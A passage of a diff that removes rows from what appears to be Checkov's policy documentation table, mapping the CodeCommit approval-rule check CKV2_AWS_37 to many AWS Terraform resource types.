-| 1026 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1027 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1028 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1029 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1030 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1031 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1032 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1033 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1034 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1035 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1036 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1037 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1038 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1039 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1040 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1041 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1042 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1043 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1044 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1045 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1046 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1047 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1048 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1049 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1050 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1051 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1052 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1053 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1054 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1055 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1056 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1057 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1058 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1059 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1060 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1061 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1062 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1063 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1064 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1065 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1066 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1067 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1068 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1069 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1070 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1071 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1072 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1073 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1074 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1075 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1076 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1077 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1078 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1079 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1080 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1081 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1082 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1083 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1084 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1085 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1086 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1087 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1088 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1089 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1090 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1091 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1092 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1093 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1094 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1095 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1096 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1097 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1098 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1099 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1100 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1101 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1102 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1103 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1104 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1105 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1106 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1107 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1108 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1109 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1110 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1111 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1112 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1113 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1114 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1115 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1116 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1117 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1118 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1119 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1120 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1121 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1122 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1123 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1124 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1125 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1126 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1127 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1128 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1129 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
